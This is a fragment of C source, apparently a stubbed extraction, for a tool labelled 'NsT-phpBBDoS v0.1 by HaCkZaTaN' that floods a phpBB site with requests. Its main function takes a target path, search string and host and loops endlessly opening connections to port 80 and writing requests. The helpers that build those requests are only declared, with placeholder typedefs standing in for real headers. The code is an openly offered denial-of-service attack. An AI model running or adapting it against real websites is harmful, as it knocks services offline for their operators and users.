
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int Connection (char*,int) ;
 int SHUT_WR ;
 int Use (char*) ;
 int WSACleanup () ;
 int Write_In (int,char*,char*,char*,int) ;
 int close (int) ;
 int closesocket (int) ;
 int fflush (int ) ;
 int puts (char*) ;
 int shutdown (int,int ) ;
 int stdout ;

int main(int argc, char *argv[])
{
    int sock, x = 0;
    char *Path = argv[1], *Pro_Sea = argv[2], *Host = argv[3];

    puts("[+] NsT-phpBBDoS v0.1 by HaCkZaTaN");
    puts("[+] NeoSecurityTeam");
    puts("[+] Dos has begun....[+]\n");
    fflush(stdout);

    if(argc != 4) Use(argv[0]);

    while(1)
    {
           sock = Connection(Host,80);
           Write_In(sock, Path, Pro_Sea, Host, x);

           shutdown(sock, SHUT_WR);
           close(sock);




           Pro_Sea = argv[2];
           x++;
    }


    return 0;
}
